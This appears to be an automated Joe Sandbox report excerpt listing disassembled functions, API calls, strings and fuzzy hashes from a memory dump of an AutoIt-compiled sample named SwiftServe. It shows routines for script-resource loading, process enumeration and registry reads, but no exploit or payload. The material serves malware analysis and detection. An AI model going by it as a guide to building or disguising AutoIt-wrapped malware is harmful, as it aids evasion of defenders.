Instruction Fuzzy Hash: 25A19170701222CFCB29EF10E598A69F7A5FF04744F1562ADE50ABB261CB30AD16CF91

Function 00E356F8 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 117
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00E70C5B

Part of subcall function 00E31821: _memmove.LIBCMT ref: 00E3185B

_memset.LIBCMT ref: 00E35787
_wcscpy.LIBCMT ref: 00E357DB
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E357EB
__swprintf.LIBCMT ref: 00E70CD1

Strings

Line %d: , xrefs: 00E70CCB
AutoIt - , xrefs: 00E35760
,z, xrefs: 00E35756

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
String ID: Line %d: $,z$AutoIt -
API String ID: 230667853-3046949335
Opcode ID: 7097bb55e7eebfd66cddb66d2d2e281faf17a32575882f8c033c96382d02988d
Instruction ID: c1cf572ce12ec7c2d37e25f53a13ce6cf3bdc9a6f583246d0543f2cd281d9776
Opcode Fuzzy Hash: 7097bb55e7eebfd66cddb66d2d2e281faf17a32575882f8c033c96382d02988d
Instruction Fuzzy Hash: 0C41A771008304AED721EB60DC89FDFBBDCAF84354F10561EF189B21A2EB70A649C796

Function 00E87681 Relevance: 12.1, APIs: 8, Instructions: 101
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00E87698

Part of subcall function 00E40FE6: std::exception::exception.LIBCMT ref: 00E4101C
Part of subcall function 00E40FE6: __CxxThrowException@8.LIBCMT ref: 00E41031

ReadFile.KERNELBASE(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00E876CF
EnterCriticalSection.KERNEL32(?), ref: 00E876EB
_memmove.LIBCMT ref: 00E87739
_memmove.LIBCMT ref: 00E87756
LeaveCriticalSection.KERNEL32(?), ref: 00E87765
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00E8777A
InterlockedExchange.KERNEL32(?,000001F6), ref: 00E87799

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 8e9fabbe1b901519de21c366a4655e796e25d354d70729e35543e765514a527e
Instruction ID: 9228bd264285b8e4efbeeea6a5b1bce666d9b6583a09ecc7855eecd887f10cf8
Opcode Fuzzy Hash: 8e9fabbe1b901519de21c366a4655e796e25d354d70729e35543e765514a527e
Instruction Fuzzy Hash: EE317031904205EFCF10EFA5DC85E6FB7B8EF45340B2441A6F908BA256D731DA58DBA0

Function 00E350DB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E35109
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E3512A
ShowWindow.USER32(00000000), ref: 00E3513E
ShowWindow.USER32(00000000), ref: 00E35147

Strings

AutoIt v3, xrefs: 00E35101, 00E35106, 00E35107
edit, xrefs: 00E35124

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: aecc3c26b3c814eae244da620d94ea9ba4f791d1df1a934bd74e161bdb809110
Instruction ID: bad1c286e328b0084aec7a6c8a9966e458a1d6eb9a13a9bd7e4dbada6c0942e7
Opcode Fuzzy Hash: aecc3c26b3c814eae244da620d94ea9ba4f791d1df1a934bd74e161bdb809110
Instruction Fuzzy Hash: 0FF0DAB15452D87EEB311B276C8DE677E7DD7CAF50F00011ABA80BA1B0C6612855DAB0

Function 00E89B16 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E34A8C: _fseek.LIBCMT ref: 00E34AA4

Part of subcall function 00E89CF1: _wcscmp.LIBCMT ref: 00E89DE1
Part of subcall function 00E89CF1: _wcscmp.LIBCMT ref: 00E89DF4

_free.LIBCMT ref: 00E89C5F
_free.LIBCMT ref: 00E89C66
_free.LIBCMT ref: 00E89CD1

Part of subcall function 00E42F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00E49C54,00000000,00E48D5D,00E459C3,?), ref: 00E42F99
Part of subcall function 00E42F85: GetLastError.KERNEL32(00000000,?,00E49C54,00000000,00E48D5D,00E459C3,?), ref: 00E42FAB

_free.LIBCMT ref: 00E89CD9

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00E89B8F

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 1552873950-2806939583
Opcode ID: a5edcd0cd56da2c52a80de0a70c91eaa28c253fc71350be47dd61ef8fe7e27d2
Instruction ID: e3854edd269e7dba898e911c8c1db89cd8a1dc2b1dfab853b9293ca9c76ad6e2
Opcode Fuzzy Hash: a5edcd0cd56da2c52a80de0a70c91eaa28c253fc71350be47dd61ef8fe7e27d2
Instruction Fuzzy Hash: 1B512CB1E04219ABDB249F64DC45AAEBBB9FF48304F00149EB65DB3281DB715A84CF58

Function 00E40FE6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E4593C: __FF_MSGBANNER.LIBCMT ref: 00E45953
Part of subcall function 00E4593C: __NMSG_WRITE.LIBCMT ref: 00E4595A
Part of subcall function 00E4593C: RtlAllocateHeap.NTDLL(01830000,00000000,00000001,?,?,?,?,00E41003,?,0000FFFF), ref: 00E4597F

std::exception::exception.LIBCMT ref: 00E4101C
__CxxThrowException@8.LIBCMT ref: 00E41031

Part of subcall function 00E487CB: RaiseException.KERNEL32(?,?,0000FFFF,00EDCAF8,?,?,?,?,?,00E41036,0000FFFF,00EDCAF8,?,00000001), ref: 00E48820

Strings

`=, xrefs: 00E41029
`=, xrefs: 00E41019, 00E41026
h=, xrefs: 00E41011

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID: `=$`=$h=
API String ID: 3902256705-3128887879
Opcode ID: bc667fe2aa01e5156ddba47107d81e7020397adb569ae291d494afbb36ad67e0
Instruction ID: a8bfdbedb9d46fe71b6da55075a91fc8c1fdffc5dfdaffbede029d697f25e24b
Opcode Fuzzy Hash: bc667fe2aa01e5156ddba47107d81e7020397adb569ae291d494afbb36ad67e0
Instruction Fuzzy Hash: C3F0C83560421DA6CB20FAACFD16ADF7BEC9F01354F202466F914B6291DFB19B84C2E0

Function 00E4563D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00E4569B
_memcpy_s.LIBCMT ref: 00E4570D
__read_nolock.LIBCMT ref: 00E4576B
__filbuf.LIBCMT ref: 00E4578E
_memset.LIBCMT ref: 00E457D2

Part of subcall function 00E48D58: __getptd_noexit.LIBCMT ref: 00E48D58

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
Instruction ID: 578ddc93f44242d0519331d219b8a5510cd19196104bb2ef06e2990c0d015fec
Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
Instruction Fuzzy Hash: 6851B632A00B05DBDB248F69E8846AE77A5AF41324F24977AF835B62D2D7709D509B40

Function 00E252B0 Relevance: 7.6, APIs: 5, Instructions: 99windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E252E6
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E2534A
TranslateMessage.USER32(?), ref: 00E25356
DispatchMessageW.USER32(?), ref: 00E25360

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Message$Peek$DispatchTranslate
String ID:
API String ID: 1795658109-0
Opcode ID: 85a8e0365ce99e06765ef6ea30842d1e95982cc1ee34ff87126424f124a23535
Instruction ID: 6f24f3aba345f6b33f11a80a2fd0449c4e57ebba4bdb3c531e7841aaf05f249c
Opcode Fuzzy Hash: 85a8e0365ce99e06765ef6ea30842d1e95982cc1ee34ff87126424f124a23535
Instruction Fuzzy Hash: 70311632508749DEEB30CB65ED84BE637E89B01348F14345AF552B61E4D3B1A84DD721

Function 00E2AC27 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91comCOMMON

Download Yara Rule

APIs

Part of subcall function 00E3FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00EA4186,00000001,00EB0980), ref: 00E3FFA7

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E2AD08
OleInitialize.OLE32(00000000), ref: 00E2AD85
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00E62F56

Strings

<w, xrefs: 00E2AC6B

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ChangeCloseFindHandleInitializeMessageNotificationRegisterWindow
String ID: <w
API String ID: 569550548-539545700
Opcode ID: 3c09941431bff9088833bc4b79cc79ca488d51f61c420caede19754c15fd52bd
Instruction ID: ffce6cf282e4a08f6531d8641fee10ce5c04826e5c4c99a6f9af401bdac29a84
Opcode Fuzzy Hash: 3c09941431bff9088833bc4b79cc79ca488d51f61c420caede19754c15fd52bd
Instruction Fuzzy Hash: B741E6B090C2C88EC359EF6BBC856557FE5EB99311714916AF4A8FB2B1EB30440DCB51

Function 00E21284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00E21275,SwapMouseButtons,00000004,?), ref: 00E212A8
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00E21275,SwapMouseButtons,00000004,?), ref: 00E212C9
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00E21275,SwapMouseButtons,00000004,?), ref: 00E212EB

Strings

Control Panel\Mouse, xrefs: 00E212A6

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 2cf55f3abe40f9b0b4ddc73fceb3064c8cab5f698cb7c55c7f3d520a800bcec1
Instruction ID: abdcb877d7efacda5fc908067d8808de087e66a6fab19a56000451178cf85e7b
Opcode Fuzzy Hash: 2cf55f3abe40f9b0b4ddc73fceb3064c8cab5f698cb7c55c7f3d520a800bcec1
Instruction Fuzzy Hash: 37114871514218FFDB208FA5EC84AEFBBA8EF15744F0055A9F805E7120D271AE44A7A0

Function 00E84148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00E8416D
Process32FirstW.KERNEL32(00000000,?), ref: 00E8417B
Process32NextW.KERNEL32(00000000,?), ref: 00E8419B
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00E84245

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
String ID:
API String ID: 3243318325-0
Opcode ID: 0045399bf4926f72027bb33728b450c6645c069a0ebfa734b7cf4733042c1033
Instruction ID: 92e90148bfcca719d9ff4a41ed255a1e3cae474d14ff8b6a706e9981db9ce870
Opcode Fuzzy Hash: 0045399bf4926f72027bb33728b450c6645c069a0ebfa734b7cf4733042c1033
Instruction Fuzzy Hash: BC31C5B11083419FD304EF50E889AAFBBE8FF95354F10152DF589E21E1EB70A949CB52

Function 00E35B29 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E35B58

Part of subcall function 00E356F8: _memset.LIBCMT ref: 00E35787
Part of subcall function 00E356F8: _wcscpy.LIBCMT ref: 00E357DB
Part of subcall function 00E356F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E357EB

KillTimer.USER32(?,00000001,?,?), ref: 00E35BAD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E35BBC
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E70D7C

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 12f6043a74ce3cb5d6c51b3c0c7a0a02be65e9be90cfda61baf9c72d173b3b07
Instruction ID: 2ab163225cc12c84a544aed718e63fa49e1ebd3f261a77331b2f1944e6058484
Opcode Fuzzy Hash: 12f6043a74ce3cb5d6c51b3c0c7a0a02be65e9be90cfda61baf9c72d173b3b07
Instruction Fuzzy Hash: 572107715047849FEB728B648899BEBFFECAF05308F00508DE79E76281C3742988CB41

Function 00E3278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00E349C2: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,00E327AF,?,00000001), ref: 00E349F4

_free.LIBCMT ref: 00E6FB04
_free.LIBCMT ref: 00E6FB4B

Part of subcall function 00E329BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E32ADF

Strings

Bad directive syntax error, xrefs: 00E6FB33

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: Bad directive syntax error
API String ID: 2861923089-2118420937
Opcode ID: b565fbd82fc4c94375af9820d867734f611a17b6f24dbeda2da02e93dd9e6a35
Instruction ID: 9535c6e5c712a77f68601975a25cc9046340e63b5242a061d97c80f35cfb0ab5
Opcode Fuzzy Hash: b565fbd82fc4c94375af9820d867734f611a17b6f24dbeda2da02e93dd9e6a35
Instruction Fuzzy Hash: 78918E71940219AFCF04EFA4E8559EEBBF4FF48354F14646AF819BB2A1DB30A904CB50

Function 00E348B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E348FA

Strings

AU3! ?, xrefs: 00E348F4
EA06, xrefs: 00E708A1

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: _memmove
String ID: AU3! ?$EA06
API String ID: 4104443479-1349402219
Opcode ID: 7dd491f0d6668271721349af3976791050808a08b8cb5147a9131eacce3c6305
Instruction ID: 9931887af4c23ba6bb9fc53cfa225fbebb450682742b56dbd9db3c4ddd35091f
Opcode Fuzzy Hash: 7dd491f0d6668271721349af3976791050808a08b8cb5147a9131eacce3c6305
Instruction Fuzzy Hash: 8A41BFA1E042589BDF269B5488497FF7FF18B85310F296075E886F72C7D620AD80C3E2

Function 00E89CF1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00E34AB2: __fread_nolock.LIBCMT ref: 00E34AD0

_wcscmp.LIBCMT ref: 00E89DE1
_wcscmp.LIBCMT ref: 00E89DF4

Strings

FILE, xrefs: 00E89D2D

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 57710bf8781aa75b19dfe86e00103e41f31d451cc3cad566304dc169e2c217d1
Instruction ID: 08033624c0a0883ac0194f41c181670e79aed403df9bd85914b750d85ddfe28d
Opcode Fuzzy Hash: 57710bf8781aa75b19dfe86e00103e41f31d451cc3cad566304dc169e2c217d1
Instruction Fuzzy Hash: 8741E771A40209BADF20EAA4CC49FEF7BFDDF45714F00046AF908B7181E671A904C7A4

Function 00E331BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E7032B
GetOpenFileNameW.COMDLG32(?), ref: 00E70375

Part of subcall function 00E40284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E32A58,?,00008000), ref: 00E402A4

Part of subcall function 00E409C5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E409E4

Strings

X, xrefs: 00E70343

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 559e257ea4d007f11762a679c6ee20201cad9ad4124606632ff618967f51f8df
Instruction ID: b91155fa5355bc753f3ecde16f546111176c32f1369e2e3ff2e305d4f0b48bfc
Opcode Fuzzy Hash: 559e257ea4d007f11762a679c6ee20201cad9ad4124606632ff618967f51f8df
Instruction Fuzzy Hash: 6C21D571A042889BDF41DFE4D849BEE7BF8AF49304F00505AE508B7241DBB45A8DCFA1

Function 00E9D1C6 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c1f294c3fe53af804537afa30fe5e181fc8cf5fa64f58c82a5b18b569594285
Instruction ID: 5f4d38c6d3364e9bb43f868d10e2bcf0ec1e706d760c505a75faf6f778d0a935
Opcode Fuzzy Hash: 1c1f294c3fe53af804537afa30fe5e181fc8cf5fa64f58c82a5b18b569594285
Instruction Fuzzy Hash: 6EF13C716083119FCB14DF28C98496ABBE5FF88318F54992DF899AB351D730E945CF82

Function 00E359D3 Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E359F9
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E35A9E
